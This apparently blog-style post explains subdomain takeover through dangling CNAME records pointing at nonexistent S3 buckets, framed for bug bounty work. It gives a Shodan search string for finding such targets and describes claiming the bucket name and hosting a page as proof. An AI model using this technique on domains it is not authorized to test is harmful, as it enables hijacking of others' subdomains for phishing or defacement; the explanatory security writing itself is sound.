Subdomain Takeover is a domain hijacking technique and occurs when there is a CNAME (Canonical Name, is basically an alias) entry pointing to a domain on a standard service such as GitHub Pages (in custom domain mode) or even Amazon services such as S3 (Simple Storage Service).
Who has never come across the iconic bucket not found message during the recon process when accessing a subdomain?
Additionally, x-amz-err-code: NoSuchBucket is a good Shodan dork for finding non-existent AWS S3 buckets.
Using the dig utility, we can query CNAME records, confirming that the domain points to a specific bucket.
In the Bug Bounty process, it is necessary to perform the takeover by creating a public bucket with the same name to be considered a valid PoC (since the mitigation consists of removing the specific CNAME entry). In this case, it is necessary to have an AWS account. It is also important to pay attention to the resource region if relevant.
Simply configure the bucket for static website hosting and upload the index.html, which will be displayed when accessing the domain.
Thanks for reading!
Top comments (0)